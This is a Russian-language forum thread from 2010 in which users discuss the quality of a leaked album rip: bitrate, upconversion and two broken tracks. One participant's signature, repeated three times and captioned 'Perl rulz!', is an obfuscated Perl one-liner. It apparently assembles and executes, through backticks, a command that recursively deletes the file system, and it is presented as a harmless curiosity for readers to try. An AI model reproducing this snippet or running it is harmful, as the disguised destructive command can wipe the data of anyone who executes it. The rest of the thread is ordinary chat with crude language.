Добавлено: Вт Сен 14, 2010 8:23 pm Заголовок сообщения:
до релиза в жопу ссылки, там не известно к чего рип делался _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!
Добавлено: Вт Сен 14, 2010 8:30 pm Заголовок сообщения:
айфон говно - в жопу такой рип, там наверняка не больше 192 кбпс, только уши вянуть будут _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!
Добавлено: Вт Сен 14, 2010 8:36 pm Заголовок сообщения:
я тебя разочарую - 320 кбпс, вот только как назло Йес, Ит'с Дженосайд и следующая еще одна песня, все время прерываются, такое ощущение, что эти песни специально так попортили, чтоб лицензионку люди покупали) _________________
Добавлено: Вт Сен 14, 2010 8:46 pm Заголовок сообщения:
ALuserX
ну надо же, а? именно та песня, что на армянском... бляди, а я так обрадовался, когда нашел ссылку) но кроме этих двух трэков, остальные в порядке) _________________
Добавлено: Вт Сен 14, 2010 9:06 pm Заголовок сообщения:
ALuserX писал(а):
апконверт, чтобы пипл хавал
ладно, уже понял) ну, я думаю, они думали, что найдутся люди вроде тебя например, что поймут, что бит-рейт апконвертован, как ты сказал _________________
Добавлено: Ср Сен 15, 2010 10:00 pm Заголовок сообщения:
metronome charisma писал(а):
romanista писал(а):
я туда больше не ногой, я же себе не враг Very Happy
а ты потролль их там
1) почему не нагой?
2) да, потролль и получи бан) Особенно за использование не английского языка ( особенно в тематических "комнатах")
_________________ An optimist sees the light at the end of the tunnel. A pessimist not sees the light. A realist sees rushing at him train. And only the driver sees three idiots sitting on the rails ...
Добавлено: Ср Сен 15, 2010 10:20 pm Заголовок сообщения:
romanista
ты зря думаешь, что он там сидит _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!